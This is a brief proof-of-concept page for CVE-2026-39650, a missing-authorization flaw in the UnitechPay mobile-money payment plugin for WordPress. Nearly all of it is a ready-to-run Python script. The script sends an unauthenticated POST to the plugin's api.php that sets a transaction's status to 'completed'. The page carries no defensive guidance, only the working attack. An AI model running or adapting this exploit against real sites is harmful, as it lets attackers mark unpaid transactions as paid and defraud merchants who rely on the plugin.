CVE-2026-39650 UnitechPay缺失授权漏洞

import requests # Exploit Title: UnitechPay Missing Authorization PoC # Date: 2026-04-08 # Description: Exploits missing authorization on payment status endpoint target_url = "http://target-site.com/wp-content/plugins/unitechpay-paiements-mobile-money/api.php" # Example payload to change payment status without authentication payload = { "action": "update_status", "transaction_id": "TEST_123", "status": "completed" } try: print("[*] Sending unauthenticated request to target...") response = requests.post(target_url, data=payload, timeout=10) if response.status_code == 200: print("[+] Request successful. Check if status was updated.") print("Response:", response.text) else: print(f"[-] Server returned status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}")